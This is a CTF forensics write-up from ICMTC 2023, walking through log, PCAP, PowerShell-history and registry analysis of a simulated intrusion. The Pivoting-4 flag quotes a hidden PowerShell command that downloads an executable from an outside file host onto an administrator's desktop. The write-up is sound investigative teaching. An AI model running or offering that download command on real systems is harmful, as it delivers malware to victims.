ICMTC CTF 2023 Qualifications | Forensics writeup

Mohamed Elmasry
6 min readJul 4, 2023

--

Hi People :D

This writeup covers 9 out of 14 forensic challenges included in the Qualifications phase of ICMTC CTF 2023, The challenges primarily focused on log analysis.

let’s begin our journey :D

[*] MalDoc (Warmup)

==========================

The ZIP file contains a PCAP file, so let’s open it in Wireshark and see what’s going on.

I consistently love to check the files within the PCAP and try to export them first, and fortunately, the solution was at this point :).

We can see all the files that were transferred using the HTTP protocol within the PCAP from File > Export Objects > HTTP .

We have a TXT file named malicious.txt so let’s export it by clicking the Save button

We have an encoded string within the malicious.txt file that we need to analyze.

It appears that the encoded string is in Base64 format. Let’s decode it using a suitable tool such as the one I used and here is the flag :D.

Flag: EGCERT{Pawned}

[*] DownloadedMalware (Easy)

======================================

The ZIP file contains one text file and two directories:

desc.txt: the descreption of the challenge.

config: contains some useless files XD.

winevt: contains Windows Event Logs.

I have searched within the PowerShell logs and process creation logs to identify any suspicious processes that may have downloaded the file but I found nothing :( .

Afterwards, my friend enlightened me about BITS (Background Intelligent Transfer Service), which could have been used for the download.

I immediately headed to the logs files and found one related to BITS client process.

The first event indicates that the DownloadingMalware task concluded at 10:04:04 (UTC +2), and this represents the first segment of the flag. However, considering that the description states the time is in UTC, it would be equivalent to 8:04:04.

For the second part, he want a tool that is used to download the file and we know that it’s a BITS but the process itself called bitsadmin.

Flag: EGCERT{08:04:04_bitsadmin}

[*] Pivoting-1 (Medium)

=============================

This is a chain of 7 challenges labeled from Pivoting-1 to Pivoting-7. Let’s begin from the start.

In this chain of challenges, we are provided with three directories: DC01, Workstation_1, and Workstation_2.

Within the DC01 directory, we found the eventlogs and registry folders. Our focus will be on the events folder since we are tasked with identifying the protocol used for logging on.

Logon events are well-known and can be found within the Security logs (Security.evtx) inside \DC01\eventlogs\Logs folder.

Since we are searching for logon events, we are particularly interested in event IDs 4624 and 4648.

In this context, we can observe an attempted logon using credentials, and it appears to be coming from SSH.

Flag: EGCERT{ssh}

[*] Pivoting-2 (Medium)

=============================

Within the Workstation_1 directory, we found eventlogs, powerShell and registry folders. The PowerShell folder looked suspicious enough to make me check it first XD.

Inside the PowerShell folder, there is a subfolder named PSReadLine. Within that folder, there is a text file called ConsoleHost_history.txt. This text file contains the history of previously executed PowerShell commands executed by the machine.

The command inside the ConsoleHost_history.txt file is responsible for downloading a malicious Python script and saving it to the following location: C:\Program Files\atx_1.py and this is the full path that we are looking for.

Flag: EGCERT{C:\Program Files\atx_1.py}

[*] Pivoting-3 & Pivoting-4 (Medium)

============================================

Once again, let’s navigate to the DC01 event logs, but this time we will focus specifically on the Windows PowerShell logs (\DC01\eventlogs\Logs\Windows PowerShell.evtx) due to the mention of a “command”.

Fortunately, we have found the command and the name of the file mentioned in one of the PowerShell events.

Pivoting-3 Flag: EGCERT{mali.exe}

Pivoting-4 Flag: EGCERT{powershell.exe -w hidden -noni -nop -exec EX https://www.mediafire.com/file/3bytgnxqzimrns0/mali.exe C:\Users\Administrator\Desktop\mali.exe}

[*] Pivoting-5 (Medium)

=============================

Similar to DC01, within the Workstation_2 directory, we also have eventlogs and registry folders.

After some log analyzing, I noticed a significant number of failed logon attempts (Event ID 4625) sent from a single device within a short period of time (and the device name is kali so it’s sus enough XD). This behavior indicates a Brute-Force attack

Flag: EGCERT{Brute Force}

[*] Pivoting-6 (Medium)

=============================

Given the discovery of a brute force attack on Workstation_2, it appears to be the entry point for the attacker. However, Workstation_2 itself is not the answer we seek.

After some time, the admin revealed that the flag is the IP address of the entry point. Hence, our objective now is to obtain the IP address of Workstation_2.

Since we already have the Registry files, I searched for a method to extract the IP address from them. My search results led me to come across This Question on superuser, and I found this answer.

Alright, let’s navigate to the SYSTEM registry file first.

After using the Registry Explorer tool to open the registry file, we proceeded to the location mentioned in the answer.

Indeed, we found an interface that contains the local IP address in this location:SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{7f91008d-beb6–41c6–9c5e-ade2ccbd964d}

Flag: EGCERT{192.168.118.155}

[*] Pivoting-7 (Medium)

=============================

This is more likely a guessing challenge XD.

We know that Workstation_2 is the entry point from previous challenges so which come next?. Based on the information from previous challenges, it is logical to assume that Workstation_1 comes next in the sequence, rather than the domain controller. This assumption is supported by the fact that a malicious script was found downloaded to Workstation_1.

Flag: EGCERT{Workstation_2, Workstation_1, DC01}

At this point, we have reached the end of this write-up. I hope you found it enjoyable and useful ❤.

Facebook TwitterLinkedIn Discord

--

--

Mohamed Elmasry
Mohamed Elmasry

Written by Mohamed Elmasry

Digital Forensics Investigator | CTF player and creator | SOC Analysts | Threat Hunter